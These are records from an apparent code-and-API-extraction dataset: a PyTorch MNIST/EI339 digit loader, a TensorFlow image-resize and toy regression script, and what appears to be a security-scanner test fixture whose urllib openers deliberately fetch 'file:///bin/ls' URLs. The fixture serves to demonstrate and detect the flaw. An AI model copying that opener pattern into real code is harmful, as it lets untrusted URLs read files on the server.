CRT_ABS_PATH, PATH_TO_DATASET["EI339"],
DATASET_SPLITS["EI339"]["raw"], str(label_num))
abs_path_to_tr_files = os.path.join(abs_path_to_file_folder, "training/")
path_to_test_files = os.path.join(abs_path_to_file_folder, "testing/")
save_label_num = 0 if 10 == label_num else label_num
save_label_num += 10
# Training Data
for file in os.listdir(abs_path_to_tr_files):
abs_path_to_tr_file = os.path.join(abs_path_to_tr_files, file)
train_data_map.append(abs_path_to_tr_file)
train_label_map.append(save_label_num)
# Test Data
for file in os.listdir(path_to_test_files):
abs_path_to_test_file = os.path.join(path_to_test_files, file)
test_data_map.append(abs_path_to_test_file)
test_label_map.append(save_label_num)
train_data_map = np.array(train_data_map) # (cnt,) <str> as <U129>
train_label_map = np.array(train_label_map) # (cnt,) <np.int32>
train_idx = np.arange(train_label_map.size)
np.random.shuffle(train_idx)
train_data_map = train_data_map[train_idx]
train_label_map = train_label_map[train_idx]
print("EI339: Train Data Mapping Shuffled")
test_data_map = np.array(test_data_map) # (cnt,) <str> as <U129>
test_label_map = np.array(test_label_map) # (cnt,) <int>
test_idx = np.arange(test_label_map.size)
np.random.shuffle(test_idx)
test_data_map = test_data_map[test_idx]
test_label_map = test_label_map[test_idx]
print("EI339: Test Data Mapping Shuffled")
np.save(arr=train_data_map, file=abs_train_data_fn)
np.save(arr=train_label_map, file=abs_train_label_fn)
np.save(arr=test_data_map, file=abs_test_data_fn)
np.save(arr=test_label_map, file=abs_test_label_fn)
return (train_data_map, train_label_map), (test_data_map, test_label_map)
def __ei339_load_raw_image__(path: str) -> np.ndarray:
img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
img = cv2.resize(img, dsize=(28, 28))
# _, img = cv2.threshold(img, thresh=128, maxval=255, type=cv2.THRESH_BINARY)
img = 255 - img
return img
def __ensure_path_validation__(filename_with_path: str) -> None:
path = os.path.split(filename_with_path)[0]
if not os.path.exists(path):
os.mkdir(path)
assert os.path.exists(path), "[Error] Access to Directory \"%s\" is Denied" % path
def __ei339_process_raw_data__() -> None:
abs_train_dataset_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_SPLITS["EI339"]["train"])
abs_test_dataset_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_SPLITS["EI339"]["test"])
if os.path.exists(abs_train_dataset_path) and os.path.exists(abs_test_dataset_path):
return
__ensure_path_validation__(abs_train_dataset_path)
__ensure_path_validation__(abs_test_dataset_path)
(train_data_fn, train_label), (test_data_fn, test_label) = \
__ei339_generate_raw_mappings__()
# train data
train_data = []
for file in tqdm(train_data_fn):
train_data.append(__ei339_load_raw_image__(path=file))
train_data = np.array(train_data)
train_data = torch.from_numpy(train_data) # torch.Size([7385, 28, 28])
train_label = torch.from_numpy(train_label).long() # torch.Size([7385])
# print(train_data.shape, train_label.shape)
# test data
test_data = []
for file in tqdm(test_data_fn):
test_data.append(__ei339_load_raw_image__(path=file))
test_data = np.array(test_data)
test_data = torch.from_numpy(test_data) # torch.Size([2034, 28, 28])
test_label = torch.from_numpy(test_label).long() # torch.Size([2034])
# print(test_data.shape, test_label.shape)
torch.save((train_data, train_label), f=abs_train_dataset_path)
torch.save((test_data, test_label), f=abs_test_dataset_path)
print("EI339: Train & Test Data Saved")
def __combine_dataset__(data_fn_list: list, output_filename: str) -> None:
assert len(data_fn_list) > 1, "[Error] Given to-Combine List if of Length 1"
if os.path.exists(output_filename):
return
__ensure_path_validation__(output_filename)
for file in data_fn_list:
if not os.path.exists(file):
raise RuntimeError("[Error] File \"%s\" NOT Exist" % file)
data_list, targets_list = [], []
for file in data_fn_list:
_data, _target = torch.load(file)
data_list.append(_data)
targets_list.append(_target)
data = torch.cat(data_list, dim=0)
targets = torch.cat(targets_list, dim=0)
torch.save((data, targets), f=output_filename)
print("Dataset Combined")
for file in data_fn_list:
print("\tFrom \"%s\"" % file)
print("\tTo \"%s\"" % output_filename)
class TorchLocalDataLoader(Dataset):
    """Dataset serving MNIST, EI339, or their combined set from local tensor files.

    Construction downloads MNIST if missing, converts the raw EI339 data, and
    builds the combined MNIST+EI339 files, then loads the requested split into
    ``self.data`` / ``self.targets`` (torch Tensors).
    """
    def __init__(self, train: bool = True,
                 transform: torchvision.transforms.transforms.Compose = None,
                 mnist: bool = False, ei339: bool = False):
        # BUG FIX: the original `assert (mnist or ei339) is True` compared with
        # `is`, which rejects truthy non-True values (e.g. 1). Plain truthiness
        # is the intended check and is backward compatible.
        assert mnist or ei339, "[Error] No Dataset is Selected"
        self.transform = transform
        self.mnist_train_path = os.path.join(
            CRT_ABS_PATH, PATH_TO_DATASET["MNIST"], DATASET_SPLITS["MNIST"]["train"])
        self.mnist_test_path = os.path.join(
            CRT_ABS_PATH, PATH_TO_DATASET["MNIST"], DATASET_SPLITS["MNIST"]["test"])
        self.ei339_train_path = os.path.join(
            CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_SPLITS["EI339"]["train"])
        self.ei339_test_path = os.path.join(
            CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_SPLITS["EI339"]["test"])
        self.combined_train_path = os.path.join(
            CRT_ABS_PATH, PATH_TO_DATASET["MNIST+EI339"], DATASET_SPLITS["MNIST+EI339"]["train"])
        self.combined_test_path = os.path.join(
            CRT_ABS_PATH, PATH_TO_DATASET["MNIST+EI339"], DATASET_SPLITS["MNIST+EI339"]["test"])
        # initialize dataset: MNIST, EI339, combined
        torchvision.datasets.MNIST(CRT_ABS_PATH, train=True, download=True)
        torchvision.datasets.MNIST(CRT_ABS_PATH, train=False, download=True)
        __ei339_process_raw_data__()
        __combine_dataset__([self.mnist_train_path, self.ei339_train_path],
                            self.combined_train_path)
        __combine_dataset__([self.mnist_test_path, self.ei339_test_path],
                            self.combined_test_path)
        # Pick the file for the requested dataset/split, then load it once
        # (the original duplicated the torch.load call in every branch).
        if mnist and ei339:
            data_file = self.combined_train_path if train else self.combined_test_path
        elif mnist:
            data_file = self.mnist_train_path if train else self.mnist_test_path
        else:  # ei339 only
            data_file = self.ei339_train_path if train else self.ei339_test_path
        self.data, self.targets = torch.load(data_file)
    def __len__(self):
        """Number of samples in the selected split."""
        return len(self.targets)
    def __getitem__(self, idx):
        """Return ``(image, label)``; image is a PIL 'L' image, transformed if set."""
        if torch.is_tensor(idx):
            idx = idx.tolist()
        img, target = self.data[idx], int(self.targets[idx])
        # doing this so that it is consistent with all other datasets
        # to return a PIL Image
        img = Image.fromarray(img.numpy(), mode='L')
        if self.transform is not None:
            img = self.transform(img)
        return img, target
if "__main__" == __name__:
    # Exploratory note: each processed MNIST file holds a tuple
    # (Tensor[60000, 28, 28], Tensor[60000]) loadable with torch.load on
    # os.path.join(PATH_TO_DATASET["MNIST"], DATASET_SPLITS["MNIST"]["train"]).
    # Standard MNIST normalization constants (mean, std).
    pipeline = torchvision.transforms.Compose([
        torchvision.transforms.ToTensor(),
        torchvision.transforms.Normalize((0.1307,), (0.3081,)),
    ])
    loader = TorchLocalDataLoader(train=True,
                                  transform=pipeline,
                                  mnist=True,
                                  ei339=True)
    train_loader = DataLoader(dataset=loader, batch_size=30, shuffle=True)
|
[
"os.mkdir",
"numpy.load",
"torch.cat",
"numpy.arange",
"torchvision.transforms.Normalize",
"os.path.join",
"torch.utils.data.DataLoader",
"torch.load",
"os.path.exists",
"torch.is_tensor",
"cv2.resize",
"numpy.random.shuffle",
"tqdm.tqdm",
"numpy.save",
"inspect.currentframe",
"torchvision.datasets.MNIST",
"os.listdir",
"torch.from_numpy",
"torch.save",
"cv2.imread",
"numpy.array",
"os.path.split",
"torchvision.transforms.ToTensor"
] |
[((1773, 1876), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_MAPPING_FN['EI339']['train']['data']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_MAPPING_FN[\n 'EI339']['train']['data'])\n", (1785, 1876), False, 'import os\n'), ((1906, 2010), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_MAPPING_FN['EI339']['train']['label']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_MAPPING_FN[\n 'EI339']['train']['label'])\n", (1918, 2010), False, 'import os\n'), ((2038, 2140), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_MAPPING_FN['EI339']['test']['data']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_MAPPING_FN[\n 'EI339']['test']['data'])\n", (2050, 2140), False, 'import os\n'), ((2169, 2272), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_MAPPING_FN['EI339']['test']['label']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_MAPPING_FN[\n 'EI339']['test']['label'])\n", (2181, 2272), False, 'import os\n'), ((3997, 4021), 'numpy.array', 'np.array', (['train_data_map'], {}), '(train_data_map)\n', (4005, 4021), True, 'import numpy as np\n'), ((4070, 4095), 'numpy.array', 'np.array', (['train_label_map'], {}), '(train_label_map)\n', (4078, 4095), True, 'import numpy as np\n'), ((4133, 4164), 'numpy.arange', 'np.arange', (['train_label_map.size'], {}), '(train_label_map.size)\n', (4142, 4164), True, 'import numpy as np\n'), ((4169, 4197), 'numpy.random.shuffle', 'np.random.shuffle', (['train_idx'], {}), '(train_idx)\n', (4186, 4197), True, 'import numpy as np\n'), ((4362, 4385), 'numpy.array', 'np.array', (['test_data_map'], {}), '(test_data_map)\n', (4370, 4385), True, 'import numpy as np\n'), ((4433, 4457), 'numpy.array', 'np.array', (['test_label_map'], {}), '(test_label_map)\n', (4441, 4457), True, 'import numpy as np\n'), ((4489, 4519), 'numpy.arange', 'np.arange', 
(['test_label_map.size'], {}), '(test_label_map.size)\n', (4498, 4519), True, 'import numpy as np\n'), ((4524, 4551), 'numpy.random.shuffle', 'np.random.shuffle', (['test_idx'], {}), '(test_idx)\n', (4541, 4551), True, 'import numpy as np\n'), ((4693, 4744), 'numpy.save', 'np.save', ([], {'arr': 'train_data_map', 'file': 'abs_train_data_fn'}), '(arr=train_data_map, file=abs_train_data_fn)\n', (4700, 4744), True, 'import numpy as np\n'), ((4749, 4802), 'numpy.save', 'np.save', ([], {'arr': 'train_label_map', 'file': 'abs_train_label_fn'}), '(arr=train_label_map, file=abs_train_label_fn)\n', (4756, 4802), True, 'import numpy as np\n'), ((4807, 4856), 'numpy.save', 'np.save', ([], {'arr': 'test_data_map', 'file': 'abs_test_data_fn'}), '(arr=test_data_map, file=abs_test_data_fn)\n', (4814, 4856), True, 'import numpy as np\n'), ((4861, 4912), 'numpy.save', 'np.save', ([], {'arr': 'test_label_map', 'file': 'abs_test_label_fn'}), '(arr=test_label_map, file=abs_test_label_fn)\n', (4868, 4912), True, 'import numpy as np\n'), ((5059, 5097), 'cv2.imread', 'cv2.imread', (['path', 'cv2.IMREAD_GRAYSCALE'], {}), '(path, cv2.IMREAD_GRAYSCALE)\n', (5069, 5097), False, 'import cv2\n'), ((5108, 5139), 'cv2.resize', 'cv2.resize', (['img'], {'dsize': '(28, 28)'}), '(img, dsize=(28, 28))\n', (5118, 5139), False, 'import cv2\n'), ((5439, 5459), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (5453, 5459), False, 'import os\n'), ((5588, 5679), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_SPLITS['EI339']['train']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_SPLITS['EI339'\n ]['train'])\n", (5600, 5679), False, 'import os\n'), ((5712, 5802), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_SPLITS['EI339']['test']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_SPLITS['EI339'\n ]['test'])\n", (5724, 5802), False, 'import os\n'), ((6182, 6201), 'tqdm.tqdm', 'tqdm', 
(['train_data_fn'], {}), '(train_data_fn)\n', (6186, 6201), False, 'from tqdm import tqdm\n'), ((6283, 6303), 'numpy.array', 'np.array', (['train_data'], {}), '(train_data)\n', (6291, 6303), True, 'import numpy as np\n'), ((6321, 6349), 'torch.from_numpy', 'torch.from_numpy', (['train_data'], {}), '(train_data)\n', (6337, 6349), False, 'import torch\n'), ((6558, 6576), 'tqdm.tqdm', 'tqdm', (['test_data_fn'], {}), '(test_data_fn)\n', (6562, 6576), False, 'from tqdm import tqdm\n'), ((6656, 6675), 'numpy.array', 'np.array', (['test_data'], {}), '(test_data)\n', (6664, 6675), True, 'import numpy as np\n'), ((6692, 6719), 'torch.from_numpy', 'torch.from_numpy', (['test_data'], {}), '(test_data)\n', (6708, 6719), False, 'import torch\n'), ((6877, 6940), 'torch.save', 'torch.save', (['(train_data, train_label)'], {'f': 'abs_train_dataset_path'}), '((train_data, train_label), f=abs_train_dataset_path)\n', (6887, 6940), False, 'import torch\n'), ((6945, 7005), 'torch.save', 'torch.save', (['(test_data, test_label)'], {'f': 'abs_test_dataset_path'}), '((test_data, test_label), f=abs_test_dataset_path)\n', (6955, 7005), False, 'import torch\n'), ((7215, 7246), 'os.path.exists', 'os.path.exists', (['output_filename'], {}), '(output_filename)\n', (7229, 7246), False, 'import os\n'), ((7639, 7666), 'torch.cat', 'torch.cat', (['data_list'], {'dim': '(0)'}), '(data_list, dim=0)\n', (7648, 7666), False, 'import torch\n'), ((7681, 7711), 'torch.cat', 'torch.cat', (['targets_list'], {'dim': '(0)'}), '(targets_list, dim=0)\n', (7690, 7711), False, 'import torch\n'), ((7717, 7763), 'torch.save', 'torch.save', (['(data, targets)'], {'f': 'output_filename'}), '((data, targets), f=output_filename)\n', (7727, 7763), False, 'import torch\n'), ((11328, 11383), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'loader', 'batch_size': '(30)', 'shuffle': '(True)'}), '(dataset=loader, batch_size=30, shuffle=True)\n', (11338, 11383), False, 'from torch.utils.data import Dataset, 
DataLoader\n'), ((2284, 2322), 'os.path.exists', 'os.path.exists', ([], {'path': 'abs_train_data_fn'}), '(path=abs_train_data_fn)\n', (2298, 2322), False, 'import os\n'), ((2327, 2366), 'os.path.exists', 'os.path.exists', ([], {'path': 'abs_train_label_fn'}), '(path=abs_train_label_fn)\n', (2341, 2366), False, 'import os\n'), ((2385, 2422), 'os.path.exists', 'os.path.exists', ([], {'path': 'abs_test_data_fn'}), '(path=abs_test_data_fn)\n', (2399, 2422), False, 'import os\n'), ((2427, 2465), 'os.path.exists', 'os.path.exists', ([], {'path': 'abs_test_label_fn'}), '(path=abs_test_label_fn)\n', (2441, 2465), False, 'import os\n'), ((3242, 3292), 'os.path.join', 'os.path.join', (['abs_path_to_file_folder', '"""training/"""'], {}), "(abs_path_to_file_folder, 'training/')\n", (3254, 3292), False, 'import os\n'), ((3322, 3371), 'os.path.join', 'os.path.join', (['abs_path_to_file_folder', '"""testing/"""'], {}), "(abs_path_to_file_folder, 'testing/')\n", (3334, 3371), False, 'import os\n'), ((3507, 3539), 'os.listdir', 'os.listdir', (['abs_path_to_tr_files'], {}), '(abs_path_to_tr_files)\n', (3517, 3539), False, 'import os\n'), ((3762, 3792), 'os.listdir', 'os.listdir', (['path_to_test_files'], {}), '(path_to_test_files)\n', (3772, 3792), False, 'import os\n'), ((5335, 5368), 'os.path.split', 'os.path.split', (['filename_with_path'], {}), '(filename_with_path)\n', (5348, 5368), False, 'import os\n'), ((5383, 5403), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (5397, 5403), False, 'import os\n'), ((5413, 5427), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (5421, 5427), False, 'import os\n'), ((5814, 5852), 'os.path.exists', 'os.path.exists', (['abs_train_dataset_path'], {}), '(abs_train_dataset_path)\n', (5828, 5852), False, 'import os\n'), ((5857, 5894), 'os.path.exists', 'os.path.exists', (['abs_test_dataset_path'], {}), '(abs_test_dataset_path)\n', (5871, 5894), False, 'import os\n'), ((7542, 7558), 'torch.load', 'torch.load', (['file'], {}), 
'(file)\n', (7552, 7558), False, 'import torch\n'), ((8267, 8358), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['MNIST']", "DATASET_SPLITS['MNIST']['train']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['MNIST'], DATASET_SPLITS['MNIST'\n ]['train'])\n", (8279, 8358), False, 'import os\n'), ((8398, 8488), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['MNIST']", "DATASET_SPLITS['MNIST']['test']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['MNIST'], DATASET_SPLITS['MNIST'\n ]['test'])\n", (8410, 8488), False, 'import os\n'), ((8529, 8620), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_SPLITS['EI339']['train']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_SPLITS['EI339'\n ]['train'])\n", (8541, 8620), False, 'import os\n'), ((8660, 8750), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_SPLITS['EI339']['test']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_SPLITS['EI339'\n ]['test'])\n", (8672, 8750), False, 'import os\n'), ((8794, 8897), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['MNIST+EI339']", "DATASET_SPLITS['MNIST+EI339']['train']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['MNIST+EI339'], DATASET_SPLITS[\n 'MNIST+EI339']['train'])\n", (8806, 8897), False, 'import os\n'), ((8940, 9042), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['MNIST+EI339']", "DATASET_SPLITS['MNIST+EI339']['test']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['MNIST+EI339'], DATASET_SPLITS[\n 'MNIST+EI339']['test'])\n", (8952, 9042), False, 'import os\n'), ((9113, 9180), 'torchvision.datasets.MNIST', 'torchvision.datasets.MNIST', (['CRT_ABS_PATH'], {'train': '(True)', 'download': '(True)'}), '(CRT_ABS_PATH, train=True, download=True)\n', (9139, 9180), False, 'import torchvision\n'), ((9189, 9257), 'torchvision.datasets.MNIST', 'torchvision.datasets.MNIST', (['CRT_ABS_PATH'], {'train': '(False)', 'download': '(True)'}), 
'(CRT_ABS_PATH, train=False, download=True)\n', (9215, 9257), False, 'import torchvision\n'), ((10262, 10282), 'torch.is_tensor', 'torch.is_tensor', (['idx'], {}), '(idx)\n', (10277, 10282), False, 'import torch\n'), ((290, 312), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (310, 312), False, 'import inspect\n'), ((3575, 3615), 'os.path.join', 'os.path.join', (['abs_path_to_tr_files', 'file'], {}), '(abs_path_to_tr_files, file)\n', (3587, 3615), False, 'import os\n'), ((3830, 3868), 'os.path.join', 'os.path.join', (['path_to_test_files', 'file'], {}), '(path_to_test_files, file)\n', (3842, 3868), False, 'import os\n'), ((6398, 6427), 'torch.from_numpy', 'torch.from_numpy', (['train_label'], {}), '(train_label)\n', (6414, 6427), False, 'import torch\n'), ((6767, 6795), 'torch.from_numpy', 'torch.from_numpy', (['test_label'], {}), '(test_label)\n', (6783, 6795), False, 'import torch\n'), ((7356, 7376), 'os.path.exists', 'os.path.exists', (['file'], {}), '(file)\n', (7370, 7376), False, 'import os\n'), ((9798, 9819), 'torch.load', 'torch.load', (['data_file'], {}), '(data_file)\n', (9808, 9819), False, 'import torch\n'), ((2528, 2554), 'numpy.load', 'np.load', (['abs_train_data_fn'], {}), '(abs_train_data_fn)\n', (2535, 2554), True, 'import numpy as np\n'), ((2556, 2583), 'numpy.load', 'np.load', (['abs_train_label_fn'], {}), '(abs_train_label_fn)\n', (2563, 2583), True, 'import numpy as np\n'), ((2604, 2629), 'numpy.load', 'np.load', (['abs_test_data_fn'], {}), '(abs_test_data_fn)\n', (2611, 2629), True, 'import numpy as np\n'), ((2631, 2657), 'numpy.load', 'np.load', (['abs_test_label_fn'], {}), '(abs_test_label_fn)\n', (2638, 2657), True, 'import numpy as np\n'), ((9967, 9988), 'torch.load', 'torch.load', (['data_file'], {}), '(data_file)\n', (9977, 9988), False, 'import torch\n'), ((10139, 10160), 'torch.load', 'torch.load', (['data_file'], {}), '(data_file)\n', (10149, 10160), False, 'import torch\n'), ((11157, 11190), 
'torchvision.transforms.ToTensor', 'torchvision.transforms.ToTensor', ([], {}), '()\n', (11188, 11190), False, 'import torchvision\n'), ((11204, 11258), 'torchvision.transforms.Normalize', 'torchvision.transforms.Normalize', (['(0.1307,)', '(0.3081,)'], {}), '((0.1307,), (0.3081,))\n', (11236, 11258), False, 'import torchvision\n')]
|
# -*- coding utf-8 -*-
import cv2
import os
import numpy as np
from sklearn.model_selection import train_test_split
import random
import tensorflow as tf
def read_data(img_path, image_h = 64, image_w = 64):
    """Load one image, pad it to a square, and resize to (image_h, image_w).

    The image and its path are wrapped in single-element data/label lists and
    passed through train_test_split (side effect kept from the original), and
    a label placeholder of shape [None, 2] is returned.

    Args:
        img_path: path to an image file readable by cv2.imread.
        image_h: output height after resizing.
        image_w: output width after resizing.

    Returns:
        A tf.placeholder of shape [None, 2] (the label placeholder ``Y``).
    """
    image_data = []
    label_data = []
    image = cv2.imread(img_path)
    h, w, _ = image.shape
    longest_edge = max(h, w)
    # Symmetric padding that makes the image square.
    # (Removed the dead `dh, dw = (0, 0)` seed and the empty `else: pass`.)
    top, bottom, left, right = (0, 0, 0, 0)
    if h < longest_edge:
        dh = longest_edge - h
        top = dh // 2
        bottom = dh - top
    elif w < longest_edge:
        dw = longest_edge - w
        left = dw // 2
        right = dw - left
    # Pad with black pixels, then scale to the target size.
    image_pad = cv2.copyMakeBorder(image, top, bottom, left, right,
                                   cv2.BORDER_CONSTANT, value=[0, 0, 0])
    image = cv2.resize(image_pad, (image_h, image_w))
    image_data.append(image)
    label_data.append(img_path)
    image_data = np.array(image_data)
    # NOTE(review): with a single sample this split is degenerate (recent
    # sklearn versions raise) -- kept as-is to preserve original behaviour.
    train_x, test_x, train_y, test_y = train_test_split(
        image_data, label_data, test_size=0.05,
        random_state=random.randint(0, 100))
    # Generalized: placeholder shape follows image_h/image_w instead of the
    # hard-coded 64x64 (identical for the default arguments).
    X = tf.placeholder(tf.float32, [None, image_h, image_w, 3])
    Y = tf.placeholder(tf.float32, [None, 2])
    return Y
#img_path = '4833.jpg'
#print(read_data(img_path))
# Toy TF1 linear-regression graph: learn W (1x2) and b so that
# y = W @ x_data + b approximates y_data = [0.1, 0.2] @ x_data + 0.3.
x_data = np.float32(np.random.rand(2,100))  # 2x100 random inputs in [0, 1)
y_data = np.dot([0.100, 0.200], x_data) + 0.300  # ground-truth targets
b = tf.Variable(tf.zeros([1]), name='B')  # bias, initialised to zero
W = tf.Variable(tf.random_uniform([1, 2], -1.0, 1.0), name='W')  # random initial weights
y = tf.add(tf.matmul(W, x_data, name='MatMul'), b ,name='add')  # model prediction
# Mean squared error between prediction and targets.
loss = tf.reduce_mean(tf.square(tf.subtract(y, y_data, name='Sub'), name='Square'), name='ReduceMean')
optimizer = tf.train.GradientDescentOptimizer(0.001, name='Optimizer')
train = optimizer.minimize(loss, name='minimize')
# TensorBoard summaries for the learned parameters and the loss.
summaries = [tf.summary.histogram('W',W), tf.summary.histogram('b', b), tf.summary.scalar('loss', loss)]
summary_op = tf.summary.merge(summaries)
print(summary_op)
|
[
"tensorflow.random_uniform",
"numpy.dot",
"tensorflow.summary.scalar",
"tensorflow.subtract",
"random.randint",
"cv2.copyMakeBorder",
"cv2.imread",
"tensorflow.placeholder",
"tensorflow.zeros",
"numpy.array",
"tensorflow.matmul",
"tensorflow.summary.histogram",
"numpy.random.rand",
"tensorflow.train.GradientDescentOptimizer",
"tensorflow.summary.merge",
"cv2.resize"
] |
[((1750, 1808), 'tensorflow.train.GradientDescentOptimizer', 'tf.train.GradientDescentOptimizer', (['(0.001)'], {'name': '"""Optimizer"""'}), "(0.001, name='Optimizer')\n", (1783, 1808), True, 'import tensorflow as tf\n'), ((1982, 2009), 'tensorflow.summary.merge', 'tf.summary.merge', (['summaries'], {}), '(summaries)\n', (1998, 2009), True, 'import tensorflow as tf\n'), ((271, 291), 'cv2.imread', 'cv2.imread', (['img_path'], {}), '(img_path)\n', (281, 291), False, 'import cv2\n'), ((753, 846), 'cv2.copyMakeBorder', 'cv2.copyMakeBorder', (['image', 'top', 'bottom', 'left', 'right', 'cv2.BORDER_CONSTANT'], {'value': '[0, 0, 0]'}), '(image, top, bottom, left, right, cv2.BORDER_CONSTANT,\n value=[0, 0, 0])\n', (771, 846), False, 'import cv2\n'), ((856, 897), 'cv2.resize', 'cv2.resize', (['image_pad', '(image_h, image_w)'], {}), '(image_pad, (image_h, image_w))\n', (866, 897), False, 'import cv2\n'), ((981, 1001), 'numpy.array', 'np.array', (['image_data'], {}), '(image_data)\n', (989, 1001), True, 'import numpy as np\n'), ((1202, 1247), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[None, 64, 64, 3]'], {}), '(tf.float32, [None, 64, 64, 3])\n', (1216, 1247), True, 'import tensorflow as tf\n'), ((1256, 1293), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[None, 2]'], {}), '(tf.float32, [None, 2])\n', (1270, 1293), True, 'import tensorflow as tf\n'), ((1386, 1408), 'numpy.random.rand', 'np.random.rand', (['(2)', '(100)'], {}), '(2, 100)\n', (1400, 1408), True, 'import numpy as np\n'), ((1419, 1445), 'numpy.dot', 'np.dot', (['[0.1, 0.2]', 'x_data'], {}), '([0.1, 0.2], x_data)\n', (1425, 1445), True, 'import numpy as np\n'), ((1477, 1490), 'tensorflow.zeros', 'tf.zeros', (['[1]'], {}), '([1])\n', (1485, 1490), True, 'import tensorflow as tf\n'), ((1519, 1555), 'tensorflow.random_uniform', 'tf.random_uniform', (['[1, 2]', '(-1.0)', '(1.0)'], {}), '([1, 2], -1.0, 1.0)\n', (1536, 1555), True, 'import tensorflow as tf\n'), ((1579, 1614), 
'tensorflow.matmul', 'tf.matmul', (['W', 'x_data'], {'name': '"""MatMul"""'}), "(W, x_data, name='MatMul')\n", (1588, 1614), True, 'import tensorflow as tf\n'), ((1876, 1904), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""W"""', 'W'], {}), "('W', W)\n", (1896, 1904), True, 'import tensorflow as tf\n'), ((1905, 1933), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""b"""', 'b'], {}), "('b', b)\n", (1925, 1933), True, 'import tensorflow as tf\n'), ((1935, 1966), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""loss"""', 'loss'], {}), "('loss', loss)\n", (1952, 1966), True, 'import tensorflow as tf\n'), ((1666, 1700), 'tensorflow.subtract', 'tf.subtract', (['y', 'y_data'], {'name': '"""Sub"""'}), "(y, y_data, name='Sub')\n", (1677, 1700), True, 'import tensorflow as tf\n'), ((1169, 1191), 'random.randint', 'random.randint', (['(0)', '(100)'], {}), '(0, 100)\n', (1183, 1191), False, 'import random\n')]
|
''' Example dangerous usage of urllib[2] opener functions
The urllib and urllib2 opener functions and object can open http, ftp,
and file urls. Often, the ability to open file urls is overlooked leading
to code that can unexpectedly open files on the local server. This
could be used by an attacker to leak information about the server.
'''
import urllib
import urllib2
# Python 3
import urllib.request
# Six
import six
def test_urlopen():
    """Exercise every opener API with a file:// URL.

    Every call below is *intentionally* dangerous: this is lint-fixture code
    demonstrating that urllib/urllib2/six opener functions accept file://
    URLs, which can leak local files.  It is not meant to be safe (or, given
    the Python 2-only urllib/urllib2 calls, even runnable on Python 3).
    """
    # urllib
    url = urllib.quote('file:///bin/ls')
    urllib.urlopen(url, 'blah', 32)
    urllib.urlretrieve('file:///bin/ls', '/bin/ls2')
    opener = urllib.URLopener()
    opener.open('file:///bin/ls')
    opener.retrieve('file:///bin/ls')
    opener = urllib.FancyURLopener()
    opener.open('file:///bin/ls')
    opener.retrieve('file:///bin/ls')
    # urllib2
    handler = urllib2.HTTPBasicAuthHandler()
    # NOTE(review): add_password normally also takes a passwd argument; this
    # call looks like it would raise TypeError if executed -- presumably it
    # only needs to parse for static analysis.
    handler.add_password(realm='test',
                         uri='http://mysite.com',
                         user='bob')
    opener = urllib2.build_opener(handler)
    urllib2.install_opener(opener)
    urllib2.urlopen('file:///bin/ls')
    urllib2.Request('file:///bin/ls')
    # Python 3
    urllib.request.urlopen('file:///bin/ls')
    urllib.request.urlretrieve('file:///bin/ls', '/bin/ls2')
    opener = urllib.request.URLopener()
    opener.open('file:///bin/ls')
    opener.retrieve('file:///bin/ls')
    opener = urllib.request.FancyURLopener()
    opener.open('file:///bin/ls')
    opener.retrieve('file:///bin/ls')
    # Six
    six.moves.urllib.request.urlopen('file:///bin/ls')
    six.moves.urllib.request.urlretrieve('file:///bin/ls', '/bin/ls2')
    opener = six.moves.urllib.request.URLopener()
    opener.open('file:///bin/ls')
    opener.retrieve('file:///bin/ls')
    opener = six.moves.urllib.request.FancyURLopener()
    opener.open('file:///bin/ls')
    opener.retrieve('file:///bin/ls')
|
[
"urllib2.HTTPBasicAuthHandler",
"urllib2.install_opener",
"urllib.quote",
"urllib.FancyURLopener",
"urllib2.Request",
"urllib.request.FancyURLopener",
"urllib.urlopen",
"urllib.request.urlopen",
"urllib.request.URLopener",
"urllib.request.urlretrieve",
"six.moves.urllib.request.urlopen",
